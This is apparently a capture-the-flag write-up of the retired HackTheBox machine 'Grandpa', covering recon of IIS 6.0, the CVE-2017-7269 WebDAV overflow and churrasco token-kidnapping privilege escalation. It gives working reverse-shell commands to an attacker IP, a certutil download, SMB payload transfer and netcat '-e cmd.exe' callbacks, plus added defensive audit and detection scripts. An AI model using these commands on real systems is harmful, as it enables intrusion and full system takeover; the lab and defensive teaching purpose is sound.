HackTheBox: Grandpa

Practicing retired HackTheBox machines. Had trouble with this one; knew what I had to do, but didn’t know how to do it. Need to practice more Windows machines.

Scanning:

  • Find running services:
crazyeights@es-base:~$ nmap -PS 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-02 11:09 EST
Nmap scan report for 10.10.10.14
Host is up (0.034s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
  • Find more information about the services (i.e. versions, etc.)
crazyeights@es-base:~$ sudo nmap -sV 10.10.10.14
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0

Web:

Index Page:

Getting Server Version Info:
crazyeights@es-base:~$ nikto -h http://10.10.10.14
- Nikto v2.1.6
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
[SNIP]
+ WebDAV enabled (PROPFIND COPY PROPPATCH UNLOCK LOCK SEARCH MKCOL listed as allowed)
[SNIP]
  • Many different potential vulnerabilities were listed by nikto
  • We know this version of Microsoft IIS is vulnerable; now we must find an exploit
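The nikto findings above (WebDAV verbs advertised, Server header Microsoft-IIS/6.0) can be reproduced with a single OPTIONS request. The script below is an added audit example, not part of the original write-up or of nikto; the host and port it is pointed at are assumptions, and `assess()` is kept network-free so the decision logic can be tested on its own.

```python
"""Audit helper (added example): send an HTTP OPTIONS request and report whether
WebDAV methods are advertised and whether the Server header identifies the
end-of-life IIS 6.0 that nikto flagged above."""
import http.client
import sys

# WebDAV verbs nikto reported in the Allow header above (plus MOVE for completeness).
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH"}


def assess(server_header, allow_header):
    """Turn the Server and Allow response headers into a list of findings.

    Pure function: no network, so it can be unit-tested with constructed headers."""
    findings = []
    methods = {m.strip().upper() for m in (allow_header or "").split(",") if m.strip()}
    exposed = sorted(methods & WEBDAV_METHODS)
    if exposed:
        findings.append("webdav-enabled: " + " ".join(exposed))
    if "microsoft-iis/6.0" in (server_header or "").lower():
        # IIS 6.0 WebDAV is the component affected by CVE-2017-7269 (see below).
        findings.append("eol-iis-6.0: WebDAV on IIS 6.0 is affected by CVE-2017-7269")
    return findings


def probe(host, port=80, timeout=5):
    """Send OPTIONS / to a live host and return assess() findings for its response."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", "/", headers={"Host": host})
        resp = conn.getresponse()
        return assess(resp.getheader("Server"), resp.getheader("Allow"))
    finally:
        conn.close()


if __name__ == "__main__":
    # Usage: python webdav_audit.py <host> [port]   (host/port are assumptions)
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    for finding in probe(target, target_port) or ["no WebDAV or IIS 6.0 indicators"]:
        print(finding)
```

An empty result means the server neither advertises WebDAV nor identifies as IIS 6.0; on a host like this one the remediation is disabling WebDAV or retiring IIS 6.0 altogether.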
Searching for exploits:
  • Using searchsploit:
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFrom | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8806.pl

This is the only one that fits:

crazyeights@es-base:~$ searchsploit -x windows/remote/41738.py
  Exploit: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
  • The exploitdb script does not work here. There are many versions of this exploit available.
The only working version of the exploit:
  • Found by googling CVE-2017-7269 reverse shell
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell
  • Download the exploit
  • Start the listener:
nc -lvp 1234
Run the exploit:
  • Command is in the format: python [exploit] [VICTIM IP] [PORT] [ATTACKER IP] [LISTENER PORT]
crazyeights@es-base:~$ python iis_webdav_20177269.py 10.10.10.14 80 10.10.14.11 1234

User:

  • You get a shell with limited privileges:
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
  • Get OS info
C:\>systeminfo
systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
[SNIP]
  • Looking around:
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  04:32 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:18 PM    <DIR>          Program Files
12/24/2017  07:27 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,088,382,464 bytes free
  • wmpub is a directory that the nt authority\network service user can write to

  • Finding users:

C:\>cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,088,439,808 bytes free

C:\Documents and Settings>cd Harry
cd Harry
Access is denied.

C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.

C:\Documents and Settings>

There are two users:

  • Harry
  • Administrator
Looking for exploits:
  • We have the server version, and it is old enough that there are definitely privilege escalation exploits for it
  • Using searchsploit:
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation                                                                | windows/local/6705.txt
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)                                                                  | windows/local/35936.py

This one must be correct - because OS version is not SP2

crazyeights@es-base:~$ searchsploit -x windows/local/6705.txt
  Exploit: Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation

Exploit steps:

  • Download the exploit executable onto the remote machine
  • Download netcat to get a reverse shell with elevated privileges
  • Start a listener and run the exploit, passing it the nc command to be run with elevated privileges
  • Connect and download the flags

Found the executable for the exploit here:

https://github.com/Re4son/Churrasco/

Found the netcat executable for windows here:

https://eternallybored.org/misc/netcat/
  • Use the 32-bit version

Tried to use a webserver to transfer the exploit to the target, didn’t work:

  • Put the exe on apache server:
crazyeights@es-base:~$ sudo cp Downloads/Churrasco-master/churrasco.exe /var/www/html/
[sudo] password for crazyeights: 
crazyeights@es-base:~$ sudo service apache2 start

  • Try to download the exe from the server:
certutil.exe -UrlCache -split -f "http://10.10.14.11/churrasco.exe" bad.exe
Instead, start an SMB server with impacket's smbserver.py and copy the files from there:
crazyeights@es-base:~/tools/impacket/examples$ sudo python3 smbserver.py share /home/
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Download the files from the SMB server:
  • Download the churrasco exploit:
C:\wmpub>copy \\10.10.14.11\share\churrasco.exe bad.exe
copy \\10.10.14.11\share\churrasco.exe bad.exe
        1 file(s) copied.
  • Download 32-bit netcat executable:
C:\wmpub>copy \\10.10.14.11\share\nc.exe nc32.exe
copy \\10.10.14.11\share\nc.exe nc32.exe
        1 file(s) copied.
Start the listener on your machine:
nc -lvp 9999
Run the exploit:
  • I had to run it multiple times because it disconnected after a certain amount of time
C:\wmpub>.\bad.exe -d "C:\wmpub\nc32.exe -e cmd.exe 10.10.14.11 9999"
.\bad.exe -d "C:\wmpub\nc32.exe -e cmd.exe 10.10.14.11 9999"
/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 696 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
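From the host's side, the chain above leaves a recognisable trail in process-creation telemetry: a command shell spawned by the IIS worker process as NETWORK SERVICE, executables launched from the writable C:\wmpub directory, and netcat started with -e. The script below is an added detection example, not part of the write-up; the event records are constructed samples in a simplified Sysmon-like shape, and the field names are assumptions.

```python
"""Detection example (added here): apply three simple rules to process-creation
records. Sample events are constructed to mirror the shells in this write-up,
with one benign event as noise."""
import ntpath

# Constructed sample events (field names are assumptions, not a real schema).
EVENTS = [
    {"user": "NT AUTHORITY\\NETWORK SERVICE", "parent": "C:\\WINDOWS\\system32\\inetsrv\\w3wp.exe",
     "image": "C:\\WINDOWS\\system32\\cmd.exe", "cmdline": "cmd.exe"},
    {"user": "NT AUTHORITY\\NETWORK SERVICE", "parent": "C:\\WINDOWS\\system32\\cmd.exe",
     "image": "C:\\wmpub\\bad.exe",
     "cmdline": '.\\bad.exe -d "C:\\wmpub\\nc32.exe -e cmd.exe 10.10.14.11 9999"'},
    {"user": "NT AUTHORITY\\SYSTEM", "parent": "C:\\wmpub\\bad.exe",
     "image": "C:\\wmpub\\nc32.exe", "cmdline": "C:\\wmpub\\nc32.exe -e cmd.exe 10.10.14.11 9999"},
    {"user": "GRANPA\\Harry", "parent": "C:\\WINDOWS\\explorer.exe",
     "image": "C:\\WINDOWS\\system32\\notepad.exe", "cmdline": "notepad.exe"},
]

WEB_WORKERS = {"w3wp.exe"}                      # IIS 6.0 worker process
SHELLS = {"cmd.exe", "powershell.exe"}
# Directories the low-privilege user could write to on this box (see dir listing above).
WRITABLE_DIRS = tuple(d.lower() for d in ("C:\\wmpub\\", "C:\\WINDOWS\\TEMP\\"))


def analyse(event):
    """Return the names of the rules an event triggers (empty list = benign)."""
    hits = []
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    # Rule 1: web server worker spawning an interactive shell (the initial foothold).
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("webserver-spawned-shell")
    # Rule 2: anything executing out of a user-writable drop directory.
    if event["image"].lower().startswith(WRITABLE_DIRS):
        hits.append("exec-from-writable-dir")
    # Rule 3: netcat binding a shell to a socket (the -e flag used above).
    if image.startswith("nc") and " -e " in event["cmdline"]:
        hits.append("netcat-reverse-shell")
    return hits


def scan(events=EVENTS):
    """Return (image, rules) for every event that triggered at least one rule."""
    return [(e["image"], analyse(e)) for e in events if analyse(e)]


if __name__ == "__main__":
    for image, rules in scan():
        print(f"{image}: {', '.join(rules)}")
```

The token theft itself (borrowing the SYSTEM token from Rpcss, as the churrasco output shows) is not visible in process-creation events alone; these rules catch the surrounding shell and file-drop activity instead.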
Get user flag:
C:\WINDOWS\TEMP>type "C:\Documents and Settings\Harry\Desktop\user.txt"
type "C:\Documents and Settings\Harry\Desktop\user.txt"
bdff5_i_dont_want_to_get_in_trouble

Root:

Get root flag:
C:\WINDOWS\TEMP>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
9359e_i_dont_want_to_get_in_trouble
C:\WINDOWS\TEMP>

FIN. 🥳